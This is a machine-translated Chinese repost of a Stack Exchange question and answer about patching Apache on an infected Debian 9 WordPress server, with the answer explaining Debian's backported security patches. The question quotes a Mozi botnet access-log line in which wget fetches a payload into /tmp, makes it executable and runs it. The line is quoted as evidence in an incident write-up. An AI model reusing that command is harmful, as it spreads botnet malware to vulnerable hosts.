Debian 9感染后apache2的升级
我最近发现,我在Google Compute引擎上运行的Wordpress博客已经感染了墨子的恶意软件,而且很长一段时间都是他们的僵尸网络的一部分(当我收到谷歌关于非法攻击第三方的警告时证实了这一点)。
首先,让我们看看我的VM运行的是什么:
OS: Debian 9 Strech
Web Server: Apache 2.4.25
DB: MySQL 5.7.30
phpMyAdmin 5.0.2
Wordpress 5.5.1让我向你们展示我的发现:
of access.log of Apache2
115[.]61.116.192 - - [20/Oct/2020:10:53:15 +0000] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 0 "-" "-"注意,它试图通过下载wget脚本,然后尝试chmod 777来执行任意代码。
of error.log of Apache2
chmod: changing permissions of '/opt/c2d/downloads/phpmyadmin/doc/html/genindex.html': Operation not permitted
chmod: changing permissions of '/opt/c2d/downloads/phpmyadmin/doc/html/index.html': Operation not permitted
chmod: changing permissions of '/opt/c2d/downloads/phpmyadmin/index.php': Operation not permitted
chmod: changing permissions of '/opt/c2d/downloads/phpmyadmin/setup/index.php': Operation not permitted他们似乎成功地执行了任意代码。虽然不是根,但用户www-data成功地选择了一个恶意php脚本。
我认为很明显,我正在运行一个易受攻击的apache版本,黑客在CVE数据库中进行搜索之后,就使用了这个漏洞CVE-2019-0211。
当我看到尽管我试图升级apache,apt说我正在运行最新版本时,我感到很惊讶。我的意思是,这是一个2019年的漏洞,当apache现在在2.5.46中时,我正在运行2.5.25版本。在进行搜索之后,我在这个Unix员额中看到Debian处理不同的包版本(我承认我没有那么多地使用Debain来了解他们对这种事情的看法)。
我的问题是:如何更新apache以修补我的系统?如您所知,我需要尽快找到解决方案。
编辑
dpkg -l apache2的输出:
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name Version Architecture Description
+++-======================-================-================-==================================================
ii apache2 2.4.25-3+deb9u9 amd64 Apache HTTP Server回答 1
Unix & Linux用户
发布于 2020-10-23 10:40:59
你可能会看到一个不存在的问题。
众所周知,Debian在发行版的生命周期内坚持同一个包的上游版本。这是他们的政策,在一种情况下是有利的,在另一种情况下是不利的。
当然,Debian正在及时解决安全问题。但是,这可能并不明显,因为他们通常不会在问题解决的上游版本中使用,并从中生成一个新的包。相反,他们正在创建一个特定的补丁,当应用到他们的发行版包含的“旧”版本时,这个补丁将修复这个问题。
例如,在Debian中,在编写本文时应用了所有发行版更新,aptitude show apache2生成包含以下行的输出:
Version: 2.4.38-3+deb10u4第一个数字(2.4.38)是Apache,而第二个部分(-3+deb10u4)可以理解为一种“修补程序级别”。当它们修复安全问题时,第二部分就会改变(与第一部分相反,第一部分是实际的Apache版本号,并且在该发行版的生命周期内保持不变)。
相反,Debian的Apache 2.4.38包源代码与最初的上游Apache 2.4.38源代码有很大不同,因为前者应用了补丁(安全修复),尽管这些补丁可能出现在后面的具有较高版本号的上游源代码中。
长话短说:只要您及时应用所有更新(apt-get update、aptitude dist-upgrade等),并且正确配置了apt (主要是/etc/apt/sources.list或/etc/apt/sources.d中的文件),您就不需要担心(黑客攻击很可能是通过Wordpress发生的,而不是通过Apache)。
https://unix.stackexchange.com/questions/615994
复制相似问题
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号